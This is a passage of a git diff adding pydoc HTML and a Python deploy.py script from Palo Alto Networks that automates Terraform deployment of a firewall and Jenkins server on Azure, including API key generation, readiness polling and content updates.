+#&nbsp;ANY&nbsp;SPECIAL,&nbsp;DIRECT,&nbsp;INDIRECT,&nbsp;OR&nbsp;CONSEQUENTIAL&nbsp;DAMAGES&nbsp;OR&nbsp;ANY&nbsp;DAMAGES<br>
+#&nbsp;WHATSOEVER&nbsp;RESULTING&nbsp;FROM&nbsp;LOSS&nbsp;OF&nbsp;USE,&nbsp;DATA&nbsp;OR&nbsp;PROFITS,&nbsp;WHETHER&nbsp;IN&nbsp;AN<br>
+#&nbsp;ACTION&nbsp;OF&nbsp;CONTRACT,&nbsp;NEGLIGENCE&nbsp;OR&nbsp;OTHER&nbsp;TORTIOUS&nbsp;ACTION,&nbsp;ARISING&nbsp;OUT&nbsp;OF<br>
+#&nbsp;OR&nbsp;IN&nbsp;CONNECTION&nbsp;WITH&nbsp;THE&nbsp;USE&nbsp;OR&nbsp;PERFORMANCE&nbsp;OF&nbsp;THIS&nbsp;SOFTWARE.<br>
+&nbsp;<br>
+#&nbsp;Author:&nbsp;Justin&nbsp;Harris&nbsp;jharris@paloaltonetworks.com<br>
+&nbsp;<br>
+Usage<br>
+&nbsp;<br>
+python&nbsp;deploy.py&nbsp;-u&nbsp;&lt;fwusername&gt;&nbsp;-p&lt;fwpassword&gt;&nbsp;-r&lt;resource&nbsp;group&gt;&nbsp;-j&lt;region&gt;</tt></p>
+<p>
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
+<tr bgcolor="#aa55cc">
+<td colspan=3 valign=bottom>&nbsp;<br>
+<font color="#ffffff" face="helvetica, arial"><big><strong>Modules</strong></big></font></td></tr>
+    
+<tr><td bgcolor="#aa55cc"><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</tt></td><td>&nbsp;</td>
+<td width="100%"><table width="100%" summary="list"><tr><td width="25%" valign=top><a href="xml.etree.ElementTree.html">xml.etree.ElementTree</a><br>
+<a href="argparse.html">argparse</a><br>
+<a href="pandevice.firewall.html">pandevice.firewall</a><br>
+<a href="json.html">json</a><br>
+</td><td width="25%" valign=top><a href="logging.html">logging</a><br>
+<a href="os.html">os</a><br>
+<a href="requests.html">requests</a><br>
+<a href="subprocess.html">subprocess</a><br>
+</td><td width="25%" valign=top><a href="sys.html">sys</a><br>
+<a href="time.html">time</a><br>
+<a href="urllib3.html">urllib3</a><br>
+<a href="uuid.html">uuid</a><br>
+</td><td width="25%" valign=top><a href="xmltodict.html">xmltodict</a><br>
+</td></tr></table></td></tr></table><p>
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
+<tr bgcolor="#ee77aa">
+<td colspan=3 valign=bottom>&nbsp;<br>
+<font color="#ffffff" face="helvetica, arial"><big><strong>Classes</strong></big></font></td></tr>
+    
+<tr><td bgcolor="#ee77aa"><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</tt></td><td>&nbsp;</td>
+<td width="100%"><dl>
+<dt><font face="helvetica, arial"><a href="builtins.html#Exception">builtins.Exception</a>(<a href="builtins.html#BaseException">builtins.BaseException</a>)
+</font></dt><dd>
+<dl>
+<dt><font face="helvetica, arial"><a href="deploy-v2.html#DeployRequestException">DeployRequestException</a>
+</font></dt></dl>
+</dd>
+</dl>
+ <p>
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
+<tr bgcolor="#ffc8d8">
+<td colspan=3 valign=bottom>&nbsp;<br>
+<font color="#000000" face="helvetica, arial"><a name="DeployRequestException">class <strong>DeployRequestException</strong></a>(<a href="builtins.html#Exception">builtins.Exception</a>)</font></td></tr>
+    
+<tr bgcolor="#ffc8d8"><td rowspan=2><tt>&nbsp;&nbsp;&nbsp;</tt></td>
+<td colspan=2><tt>Common&nbsp;base&nbsp;class&nbsp;for&nbsp;all&nbsp;non-exit&nbsp;exceptions.<br>&nbsp;</tt></td></tr>
+<tr><td>&nbsp;</td>
+<td width="100%"><dl><dt>Method resolution order:</dt>
+<dd><a href="deploy-v2.html#DeployRequestException">DeployRequestException</a></dd>
+<dd><a href="builtins.html#Exception">builtins.Exception</a></dd>
+<dd><a href="builtins.html#BaseException">builtins.BaseException</a></dd>
+<dd><a href="builtins.html#object">builtins.object</a></dd>
+</dl>
+<hr>
+Data descriptors defined here:<br>
+<dl><dt><strong>__weakref__</strong></dt>
+<dd><tt>list&nbsp;of&nbsp;weak&nbsp;references&nbsp;to&nbsp;the&nbsp;object&nbsp;(if&nbsp;defined)</tt></dd>
+</dl>
+<hr>
+Methods inherited from <a href="builtins.html#Exception">builtins.Exception</a>:<br>
+<dl><dt><a name="DeployRequestException-__init__"><strong>__init__</strong></a>(self, /, *args, **kwargs)</dt><dd><tt>Initialize&nbsp;self.&nbsp;&nbsp;See&nbsp;help(type(self))&nbsp;for&nbsp;accurate&nbsp;signature.</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__new__"><strong>__new__</strong></a>(*args, **kwargs)<font color="#909090"><font face="helvetica, arial"> from <a href="builtins.html#type">builtins.type</a></font></font></dt><dd><tt>Create&nbsp;and&nbsp;return&nbsp;a&nbsp;new&nbsp;object.&nbsp;&nbsp;See&nbsp;help(type)&nbsp;for&nbsp;accurate&nbsp;signature.</tt></dd></dl>
+
+<hr>
+Methods inherited from <a href="builtins.html#BaseException">builtins.BaseException</a>:<br>
+<dl><dt><a name="DeployRequestException-__delattr__"><strong>__delattr__</strong></a>(self, name, /)</dt><dd><tt>Implement&nbsp;delattr(self,&nbsp;name).</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__getattribute__"><strong>__getattribute__</strong></a>(self, name, /)</dt><dd><tt>Return&nbsp;getattr(self,&nbsp;name).</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__reduce__"><strong>__reduce__</strong></a>(...)</dt><dd><tt>helper&nbsp;for&nbsp;pickle</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__repr__"><strong>__repr__</strong></a>(self, /)</dt><dd><tt>Return&nbsp;repr(self).</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__setattr__"><strong>__setattr__</strong></a>(self, name, value, /)</dt><dd><tt>Implement&nbsp;setattr(self,&nbsp;name,&nbsp;value).</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-__setstate__"><strong>__setstate__</strong></a>(...)</dt></dl>
+
+<dl><dt><a name="DeployRequestException-__str__"><strong>__str__</strong></a>(self, /)</dt><dd><tt>Return&nbsp;str(self).</tt></dd></dl>
+
+<dl><dt><a name="DeployRequestException-with_traceback"><strong>with_traceback</strong></a>(...)</dt><dd><tt><a href="builtins.html#Exception">Exception</a>.<a href="#DeployRequestException-with_traceback">with_traceback</a>(tb)&nbsp;--<br>
+set&nbsp;self.<strong>__traceback__</strong>&nbsp;to&nbsp;tb&nbsp;and&nbsp;return&nbsp;self.</tt></dd></dl>
+
+<hr>
+Data descriptors inherited from <a href="builtins.html#BaseException">builtins.BaseException</a>:<br>
+<dl><dt><strong>__cause__</strong></dt>
+<dd><tt>exception&nbsp;cause</tt></dd>
+</dl>
+<dl><dt><strong>__context__</strong></dt>
+<dd><tt>exception&nbsp;context</tt></dd>
+</dl>
+<dl><dt><strong>__dict__</strong></dt>
+</dl>
+<dl><dt><strong>__suppress_context__</strong></dt>
+</dl>
+<dl><dt><strong>__traceback__</strong></dt>
+</dl>
+<dl><dt><strong>args</strong></dt>
+</dl>
+</td></tr></table></td></tr></table><p>
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
+<tr bgcolor="#eeaa77">
+<td colspan=3 valign=bottom>&nbsp;<br>
+<font color="#ffffff" face="helvetica, arial"><big><strong>Functions</strong></big></font></td></tr>
+    
+<tr><td bgcolor="#eeaa77"><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</tt></td><td>&nbsp;</td>
+<td width="100%"><dl><dt><a name="-apply_tf"><strong>apply_tf</strong></a>(working_dir, vars, description)</dt><dd><tt>Handles&nbsp;terraform&nbsp;operations&nbsp;and&nbsp;returns&nbsp;variables&nbsp;in&nbsp;outputs.tf&nbsp;as&nbsp;a&nbsp;dict.<br>
+:param&nbsp;working_dir:&nbsp;Directory&nbsp;that&nbsp;contains&nbsp;the&nbsp;tf&nbsp;files<br>
+:param&nbsp;vars:&nbsp;Additional&nbsp;variables&nbsp;passed&nbsp;in&nbsp;to&nbsp;override&nbsp;defaults&nbsp;equivalent&nbsp;to&nbsp;-var<br>
+:param&nbsp;description:&nbsp;Description&nbsp;of&nbsp;the&nbsp;deployment&nbsp;for&nbsp;logging&nbsp;purposes<br>
+:return:&nbsp;&nbsp;&nbsp;&nbsp;return_code&nbsp;-&nbsp;0&nbsp;for&nbsp;success&nbsp;or&nbsp;other&nbsp;for&nbsp;failure<br>
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;outputs&nbsp;-&nbsp;Dictionary&nbsp;of&nbsp;the&nbsp;terraform&nbsp;outputs&nbsp;defined&nbsp;in&nbsp;the&nbsp;outputs.tf&nbsp;file</tt></dd></dl>
+ <dl><dt><a name="-create_azure_fileshare"><strong>create_azure_fileshare</strong></a>(share_prefix, account_name, account_key)</dt><dd><tt>Generate&nbsp;a&nbsp;unique&nbsp;share&nbsp;name&nbsp;to&nbsp;avoid&nbsp;overlaps&nbsp;in&nbsp;shared&nbsp;infra<br>
+:param&nbsp;share_prefix:<br>
+:param&nbsp;account_name:<br>
+:param&nbsp;account_key:<br>
+:return:</tt></dd></dl>
+ <dl><dt><a name="-getApiKey"><strong>getApiKey</strong></a>(hostname, username, password)</dt><dd><tt>Generates&nbsp;a&nbsp;Paloaltonetworks&nbsp;api&nbsp;key&nbsp;from&nbsp;username&nbsp;and&nbsp;password&nbsp;credentials<br>
+:param&nbsp;hostname:&nbsp;Ip&nbsp;address&nbsp;of&nbsp;firewall<br>
+:param&nbsp;username:<br>
+:param&nbsp;password:<br>
+:return:&nbsp;api_key&nbsp;API&nbsp;key&nbsp;for&nbsp;firewall</tt></dd></dl>
+ <dl><dt><a name="-getFirewallStatus"><strong>getFirewallStatus</strong></a>(fwIP, api_key)</dt></dl>
+ <dl><dt><a name="-getServerStatus"><strong>getServerStatus</strong></a>(IP)</dt><dd><tt>Gets&nbsp;the&nbsp;server&nbsp;status&nbsp;by&nbsp;sending&nbsp;an&nbsp;HTTP&nbsp;request&nbsp;and&nbsp;checking&nbsp;for&nbsp;a&nbsp;200&nbsp;response&nbsp;code</tt></dd></dl>
+ <dl><dt><a name="-main"><strong>main</strong></a>(username, password, rg_name, azure_region)</dt><dd><tt>Main&nbsp;function<br>
+:param&nbsp;username:<br>
+:param&nbsp;password:<br>
+:param&nbsp;rg_name:&nbsp;Resource&nbsp;group&nbsp;name&nbsp;prefix<br>
+:param&nbsp;azure_region:&nbsp;Region<br>
+:return:</tt></dd></dl>
+ <dl><dt><a name="-send_request"><strong>send_request</strong></a>(call)</dt><dd><tt>Handles&nbsp;sending&nbsp;requests&nbsp;to&nbsp;API<br>
+:param&nbsp;call:&nbsp;url<br>
+:return:&nbsp;Retruns&nbsp;result&nbsp;of&nbsp;call.&nbsp;Will&nbsp;return&nbsp;response&nbsp;for&nbsp;codes&nbsp;between&nbsp;200&nbsp;and&nbsp;400.<br>
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;200&nbsp;response&nbsp;code&nbsp;is&nbsp;required&nbsp;check&nbsp;value&nbsp;in&nbsp;response</tt></dd></dl>
+ <dl><dt><a name="-update_fw"><strong>update_fw</strong></a>(fwMgtIP, api_key)</dt><dd><tt>Applies&nbsp;latest&nbsp;AppID,&nbsp;Threat&nbsp;and&nbsp;AV&nbsp;updates&nbsp;to&nbsp;firewall&nbsp;after&nbsp;launch<br>
+:param&nbsp;fwMgtIP:&nbsp;Firewall&nbsp;management&nbsp;IP<br>
+:param&nbsp;api_key:&nbsp;API&nbsp;key</tt></dd></dl>
+ <dl><dt><a name="-update_status"><strong>update_status</strong></a>(key, value)</dt><dd><tt>For&nbsp;tracking&nbsp;purposes.&nbsp;&nbsp;Write&nbsp;responses&nbsp;to&nbsp;file.<br>
+:param&nbsp;key:<br>
+:param&nbsp;value:<br>
+:return:</tt></dd></dl>
+ <dl><dt><a name="-walkdict"><strong>walkdict</strong></a>(d, key)</dt><dd><tt>Finds&nbsp;a&nbsp;key&nbsp;in&nbsp;a&nbsp;dict&nbsp;or&nbsp;nested&nbsp;dict&nbsp;and&nbsp;returns&nbsp;the&nbsp;value&nbsp;associated&nbsp;with&nbsp;it<br>
+:param&nbsp;d:&nbsp;dict&nbsp;or&nbsp;nested&nbsp;dict<br>
+:param&nbsp;key:&nbsp;key&nbsp;value<br>
+:return:&nbsp;value&nbsp;associated&nbsp;with&nbsp;key</tt></dd></dl>
+ <dl><dt><a name="-write_status_file"><strong>write_status_file</strong></a>(message_dict)</dt><dd><tt>Writes&nbsp;the&nbsp;deployment&nbsp;state&nbsp;to&nbsp;a&nbsp;dict&nbsp;and&nbsp;outputs&nbsp;to&nbsp;file&nbsp;for&nbsp;status&nbsp;tracking</tt></dd></dl>
+</td></tr></table><p>
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
+<tr bgcolor="#55aa55">
+<td colspan=3 valign=bottom>&nbsp;<br>
+<font color="#ffffff" face="helvetica, arial"><big><strong>Data</strong></big></font></td></tr>
+    
+<tr><td bgcolor="#55aa55"><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</tt></td><td>&nbsp;</td>
+<td width="100%"><strong>formatter</strong> = &lt;logging.Formatter object&gt;<br>
+<strong>handler</strong> = &lt;StreamHandler &lt;stderr&gt; (NOTSET)&gt;<br>
+<strong>logger</strong> = &lt;RootLogger root (INFO)&gt;<br>
+<strong>status_output</strong> = {}</td></tr></table>
+</body></html>
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/deploy.py b/azure/Jenkins_proj-working/deploy.py
new file mode 100644
index 00000000..ee691764
--- /dev/null
+++ b/azure/Jenkins_proj-working/deploy.py
@@ -0,0 +1,730 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py --username <fwusername> -p<fwpassword> -r<resource group> -j<region>
+
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+import requests
+import urllib3
+
+from azure.common import AzureException
+from azure.storage.file import FileService
+
+
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+
+    """
+    Handles sending requests to API
+    :param call: url
+    :return: Retruns result of call. Will return response for codes between 200 and 400.
+             If 200 response code is required check value in response
+    """
+    headers = {'Accept-Encoding' : 'None',
+               'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+                              'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+    try:
+        r = requests.get(call, headers = headers, verify=False, timeout=5)
+        r.raise_for_status()
+    except requests.exceptions.HTTPError as errh:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response 
+        '''
+        logger.debug("DeployRequestException Http Error:")
+        raise DeployRequestException("Http Error:")
+    except requests.exceptions.ConnectionError as errc:
+        logger.debug("DeployRequestException Connection Error:")
+        raise DeployRequestException("Connection Error")
+    except requests.exceptions.Timeout as errt:
+        logger.debug("DeployRequestException Timeout Error:")
+        raise DeployRequestException("Timeout Error")
+    except requests.exceptions.RequestException as err:
+        logger.debug("DeployRequestException RequestException Error:")
+        raise DeployRequestException("Request Error")
+    else:
+        return r
+
+
+class DeployRequestException(Exception):
+    pass
+
+def walkdict(dict, match):
+    """
+    Finds a key in a dict or nested dict and returns the value associated with it
+    :param d: dict or nested dict
+    :param key: key value
+    :return: value associated with key
+    """
+    for key, v in dict.items():
+        if key == match:
+            jobid = v
+            return jobid
+        elif isinstance(v, OrderedDict):
+            found = walkdict(v, match)
+            if found is not None:
+                return found
+
+
+
+def update_fw(fwMgtIP, api_key):
+    """
+    Applies latest AppID, Threat and AV updates to firewall after launch
+    :param fwMgtIP: Firewall management IP
+    :param api_key: API key
+
+    """
+    # # Download latest applications and threats
+
+    type = "op"
+    cmd = "<request><content><upgrade><download><latest></latest></download></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    getjobid = 0
+    jobid = ''
+    key = 'job'
+
+    # FIXME - Remove Duplicate code for parsing jobid
+
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    # FIXME - Remove Duplicate code for showing job status
+
+    completed = 0
+    while (completed == 0):
+        time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        try:
+            r = send_request(call)
+            logger.info('Got Response {} to show jobs '.format(r.text))
+        except:
+            DeployRequestException
+            logger.debug("failed to get jobid this time.  Try again")
+        else:
+            tree = ET.fromstring(r.text)
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("APP+TP download Complete ")
+                        completed = 1
+                    print("Download latest Applications and Threats update")
+                    status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+                except:
+                    logger.info('Checking job is complete')
+                    completed = 1
+            else:
+                logger.info('Unable to determine job status')
+                completed = 1
+
+    # Install latest content update
+    type = "op"
+    cmd = "<request><content><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    getjobid = 0
+    jobid = ''
+    key = 'job'
+
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    completed = 0
+    while (completed == 0):
+        time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        try:
+            r = send_request(call)
+            logger.info('Got Response {} to show jobs '.format(r.text))
+        except:
+            DeployRequestException
+            logger.debug("failed to get jobid this time.  Try again")
+        else:
+            tree = ET.fromstring(r.text)
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("APP+TP Install Complete ")
+                        completed = 1
+                    print("Install latest Applications and Threats update")
+                    status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+                except:
+                    logger.info('Checking job is complete')
+                    completed = 1
+            else:
+                logger.info('Unable to determine job status')
+                completed = 1
+
+
+    # Download latest anti-virus update without committing
+    getjobid = 0
+    jobid = ''
+    type = "op"
+    cmd = "<request><anti-virus><upgrade><download><latest></latest></download></upgrade></anti-virus></request>"
+    key = 'job'
+    while getjobid == 0:
+        try:
+            call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+            r = send_request(call)
+            logger.info('Got response to request AV install {}'.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    completed = 0
+    while (completed == 0):
+        time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
+            fwMgtIP, jobid, api_key)
+        r = send_request(call)
+        tree = ET.fromstring(r.text)
+        logger.debug('Got response for show job {}'.format(r.text))
+        if tree.attrib['status'] == 'success':
+            try:
+                if (tree[0][0][5].text == 'FIN'):
+                    logger.info("AV install Status Complete ")
+                    completed = 1
+                else:
+                    status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+            except:
+                logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+                completed = 1
+        else:
+            logger.info('Unable to determine job status')
+            completed = 1
+
+
+def getApiKey(hostname, username, password):
+
+    """
+    Generates a Paloaltonetworks api key from username and password credentials
+    :param hostname: Ip address of firewall
+    :param username:
+    :param password:
+    :return: api_key API key for firewall
+    """
+
+
+    call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+    api_key = ""
+    while True:
+        try:
+            # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+            response = send_request(call)
+
+
+        except DeployRequestException as updateerr:
+            logger.info("No response from FW. Wait 20 secs before retry")
+            time.sleep(10)
+            continue
+
+        else:
+            api_key = ET.XML(response.content)[0][0].text
+            logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+            logger.debug("Response to get_api is {}".format(response))
+            return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+    fwip = fwIP
+
+    """
+    Gets the firewall status by sending the API request show chassis status.
+    :param fwMgtIP:  IP Address of firewall interface to be probed
+    :param api_key:  Panos API key
+    """
+
+    url = "https://%s/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=%s" % (fwip, api_key)
+    # Send command to fw and see if it times out or we get a response
+    logger.info("Sending command 'show chassis status' to firewall")
+    try:
+        response = requests.get(url, verify=False, timeout=10)
+        response.raise_for_status()
+    except requests.exceptions.Timeout as fwdownerr:
+        logger.debug("No response from FW. So maybe not up!")
+        return 'no'
+        # sleep and check again?
+    except requests.exceptions.HTTPError as fwstartgerr:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response
+        raise_for_status() throws HTTPError for error responses
+        '''
+        logger.infor("Http Error: {}: ".format(fwstartgerr))
+        return 'cmd_error'
+    except requests.exceptions.RequestException as err:
+        logger.debug("Got RequestException response from FW. So maybe not up!")
+        return 'cmd_error'
+    else:
+        logger.debug("Got response to 'show chassis status' {}".format(response))
+
+        resp_header = ET.fromstring(response.content)
+        logger.debug('Response header is {}'.format(resp_header))
+
+        if resp_header.tag != 'response':
+            logger.debug("Did not get a valid 'response' string...maybe a timeout")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'error':
+            logger.debug("Got an error for the command")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'success':
+            # The fw responded with a successful command execution. So is it ready?
+            for element in resp_header:
+                if element.text.rstrip() == 'yes':
+                    logger.info("FW Chassis is ready to accept configuration and connections")
+                    return 'yes'
+                else:
+                    logger.info("FW Chassis not ready, still waiting for dataplane")
+                    time.sleep(10)
+                    return 'almost'
+
+
+def update_status(key, value):
+    """
+    For tracking purposes.  Write responses to file.
+    :param key:
+    :param value:
+    :return:
+    """
+    global status_output
+
+    if type(status_output) is not dict:
+        logger.info('Creating new status_output object')
+        status_output = dict()
+
+    if key is not None and value is not None:
+        status_output[key] = value
+
+    # write status to file to future tracking
+    write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+    """
+    Writes the deployment state to a dict and outputs to file for status tracking
+    """
+    try:
+        message_json = json.dumps(message_dict)
+        with open('deployment_status.json', 'w+') as dpj:
+            dpj.write(message_json)
+
+    except ValueError as ve:
+        logger.error('Could not write status file!')
+        print('Could not write status file!')
+        sys.exit(1)
+
+
+def create_azure_fileshare(share_prefix, account_name, account_key):
+    """
+    Generate a unique share name to avoid overlaps in shared infra
+    :param share_prefix:
+    :param account_name:
+    :param account_key:
+    :return:
+    """
+
+    # FIXME - Need to remove hardcoded directoty link below
+
+    d_dir = './WebInDeploy/bootstrap'
+    share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4()))
+    print('using share_name of: {}'.format(share_name))
+
+    # archive_file_path = _create_archive_directory(files, share_prefix)
+
+    try:
+        # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this
+        s = requests.Session()
+        s.verify = False
+
+        file_service = FileService(account_name=account_name, account_key=account_key, request_session=s)
+
+        # print(file_service)
+        if not file_service.exists(share_name):
+            file_service.create_share(share_name)
+
+        for d in ['config', 'content', 'software', 'license']:
+            print('creating directory of type: {}'.format(d))
+            if not file_service.exists(share_name, directory_name=d):
+                file_service.create_directory(share_name, d)
+
+            # FIXME - We only handle bootstrap files.  May need to handle other dirs
+
+            if d == 'config':
+                for filename in os.listdir(d_dir):
+                    print('creating file: {0}'.format(filename))
+                    file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename))
+
+    except AttributeError as ae:
+        # this can be returned on bad auth information
+        print(ae)
+        return "Authentication or other error creating bootstrap file_share in Azure"
+
+    except AzureException as ahe:
+        print(ahe)
+        return str(ahe)
+    except ValueError as ve:
+        print(ve)
+        return str(ve)
+
+    print('all done')
+    return share_name
+
+
+def getServerStatus(IP):
+    """
+    Gets the server status by sending an HTTP request and checking for a 200 response code
+
+    """
+    global gcontext
+
+    call = ("http://" + IP + "/")
+    logger.info('URL request is {}'.format(call))
+    # Send command to fw and see if it times out or we get a response
+    count = 0
+    max_count = 12
+    while True:
+        if count < max_count:
+            time.sleep(10)
+            try:
+                count = count + 1
+                r = send_request(call)
+            except DeployRequestException as e:
+                logger.debug("Got Invalid response".format(e))
+            else:
+                logger.info('Jenkins Server responded with HTTP 200 code')
+                return 'server_up'
+        else:
+            break
+    return 'server_down'
+
+
+def apply_tf(working_dir, vars, description):
+
+    """
+    Handles terraform operations and returns variables in outputs.tf as a dict.
+    :param working_dir: Directory that contains the tf files
+    :param vars: Additional variables passed in to override defaults equivalent to -var
+    :param description: Description of the deployment for logging purposes
+    :return:    return_code - 0 for success or other for failure
+                outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
+    """
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    # Class Terraform uses subprocess and setting capture_output to True will capture output
+    capture_output = kwargs.pop('capture_output', False)
+
+    if capture_output is True:
+        stderr = subprocess.PIPE
+        stdout = subprocess.PIPE
+    else:
+        # if capture output is False, then everything will essentially go to stdout and stderrf
+        stderr = sys.stderr
+        stdout = sys.stdout
+
+    start_time = time.asctime()
+    print('Starting Deployment at {}\n'.format(start_time))
+
+    # Create Bootstrap
+
+    tf = Terraform(working_dir=working_dir)
+
+    tf.cmd('init')
+    if run_plan:
+
+        # print('Calling tf.plan')
+        tf.plan(capture_output=False)
+
+    return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output,
+                                            skip_plan = True, **kwargs)
+    outputs = tf.output()
+
+    logger.debug('Got Return code {} for deployment of  {}'.format(return_code, description))
+
+    return (return_code, outputs)
+
+
+def main(username, password, rg_name, azure_region):
+
+    """
+    Main function
+    :param username:
+    :param password:
+    :param rg_name: Resource group name prefix
+    :param azure_region: Region
+    :return:
+    """
+    username = username
+    password = password
+
+    WebInBootstrap_vars = {
+        'RG_Name': rg_name,
+        'Azure_Region': azure_region
+    }
+
+    WebInDeploy_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password,
+        'Azure_Region': azure_region
+    }
+
+    WebInFWConf_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    #
